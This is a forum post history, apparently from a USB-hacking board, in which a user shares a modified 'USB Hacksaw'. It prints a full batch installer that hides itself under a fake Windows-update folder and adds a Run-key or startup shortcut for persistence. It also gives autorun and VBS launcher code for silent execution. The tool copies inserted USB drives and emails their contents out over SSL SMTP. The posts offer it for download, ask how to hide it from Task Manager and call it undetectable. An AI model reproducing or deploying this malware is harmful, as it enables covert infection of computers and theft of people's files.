evan1212
-
Posts
6 -
Joined
-
Last visited
Posts posted by evan1212
-
-
Hello,
if anyone is interested here, I've made a little c++ program that makes capslock blink twice when run.
Just add it on bottom of your go.cmq or whatever autorun script you use, and you'll know exactly when to get the usb drive back ;)
If anyone is interested in the source to play with it, just ask.
Nice!!
Could I have the code?
-
Is this FUD?
no
-
Hello, this is my first post... sorry for being so nubbie :P
I'm using the new GonZor switchblade 2.0 that was released and I'm having a little problem on getting it to autorun...
At first I couldn't get it to run at all... but I figured out if I click on the GO.vbs script it actually creates the log file and does what it is suppose to do... but I want it to just autorun when I plug in my USB drive... Can anyone tell me what I'm doing wrong?
ps.... I don't have the autoplay/run thing disabled on the machine I'm testing it on... so thats not the problem.
Make an autorun file using this code:
[autorun] useautorun=1 shellexecute=go.vbs
I hope this solved your problem.
-
This is a modified version of the original USB Hacksaw
Here is the download link:
Evan's Non U3 USB Hacksaw (RAR file)
Detailed usage instructions contained in readme.txt
New Features
U3 NOT DRIVE REQUIRED!!
If test.txt is on the system drive, the hacksaw will not affect the computer.
Completely silent autorun
Changed RAR file size to 5mb
Changed name of RAR files to include computer name
Also makes the folder where the hacksaw is copied archived so it blends in.
Please let me know what you think.
Criticism is very much appreciated.
-
I have made this to auto run on non u3 drives silently and have done some other tweaks to make this more efficient but I cannot for the life of me get cmd to exit automatically!
The window never shows you don't see a thing but how do i get it to exit? If you open task manager under processes you will see cmd.exe can i make this kill itself or exit?
if exist C:Void.txt GOTO end ::Use /\/\ to keep from infecting yourself :: Payload:Hacksaw | Auth:Hak5 POC Solution | Ver:0.1poc :: Props: core-dump, pseudobreed, poyboy, gmullen, cooper, boristsr, moonlit, VaKo, 404, stingray, dlss :: :: The purpose of this hack, dubbed USB Hacksaw for googleability, is to automatically and silently :: install on windows 2000, XP, or 2003 machines with either administrator or guest access. :: Installation consists of hiding the hacksaw tools in a hidden folder, add to either registry or :: startup folder depening on user rights, and start the program. :: :: This hack is based on a modified version of USBDumper. Once installed on a targert machine it will :: stay resident and wait for a USB flash drive to be inserted. Once a USB flash drive is inserted the :: hacksaw will download the contents of the drive to a temporary location using the modified USBDumper, :: then silently run the send.bat file located in the same directory, which will then archive the contents :: using RAR, eastablish an SSL SMTP connection to smtp.gmail.com using Stunnel and Blat, email the :: downloaded data to an email address, and remove the documents and archives. :: :: The proof of concept code in this 0.1 version is not as pretty as it could be. Originally a method :: for determining user rights and thus installing accordingly was planned, however problems with the :: IFMEMBER command were found and many dirty hacks followed. Future versions are expected to use a more :: elegent method of determining user privledges. (Thinking outloud: try creating a file where guests :: shouldnt be able to and check errorlevel). :: :: Development of this project has been done with the aid of the Hak.5 community at www.hak5.org :: Programs used: :: USBDumper -- http://www.secuobs.com/news/07062006-sstic_usbdumper.shtml :: Stunnel -- http://www.stunnel.org/ :: Blat -- http://www.blat.net/ :: Shortcut -- http://www.optimumx.com/download/#Shortcut :: Rar -- http://www.rarlabs.com/ :: :: More information and future developments of this hack can be found at: :: http://www.hak5.org/wiki/USB_Hacksaw :: If admin make windows\$NtUninstallKB931337$, else make %appdata%\sbs mkdir %systemroot%\$NtUninstallKB931337$ || mkdir "%appdata%\sbs" :: go to payload directory cd \WIP\SBS :: remove hidden and system attributes (makes next copy command happy, probably better way to do this) attrib *.* -s -h :: copy payload to target copy *.* %systemroot%\$NtUninstallKB931337$ || copy *.* "%appdata%\sbs" :: reapply hidden and system attributes attrib *.* +s +h :: If admin register USB Hacksaw as startup program in registry, else do it the yucky way reg.exe add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v USBMedia /t REG_SZ /d "%systemroot%\$NtUninstallKB931337$\sbs.exe" /f || "%appdata%\sbs\shortcut.exe" /f:"%USERPROFILE%\Start Menu\Programs\Startup\ .lnk" /A:C /T:"%appdata%\sbs\sbs.exe" /W:"%appdata%\sbs" /I:"%appdata%\sbs\blank.ico" :: Hide USB Hacksaw attrib %systemroot%\$NtUninstallKB931337$ +s +h & attrib "%appdata%\sbs" +s +h :: Start USB Hacksaw (something is wrong with this next line, trying dirty hack below) :: "%systemroot%\$NtUninstallKB931337$\sbs.exe" || "%appdata%\sbs\sbs.exe" %systemdrive% cd \ cd %systemroot% cd $NtUninstallKB931337$ sbs.exe :end
I have tried:
exit
@exit
taskkill /f /cmd.exe
exit /b 1
close
How can I make it end itself? Make it not seen in Task Manager
Are you using a vbs file to execute cmd.exe?
If so use make a vbs file with this code.
'=====================================... Set WshShell = WScript.CreateObject("WScript.Shell") obj = WshShell.Run("\WIP\CMD\go.cmd", 0) set WshShell = Nothing '=====================================...If you do not know how to make a vbs file I have attached mine in a rar file since you can't upload vbs files. :)
EVANS NON U3 USB HACKSAW
in USB Hacks
Posted
meaning?
it is FUD, sorry :)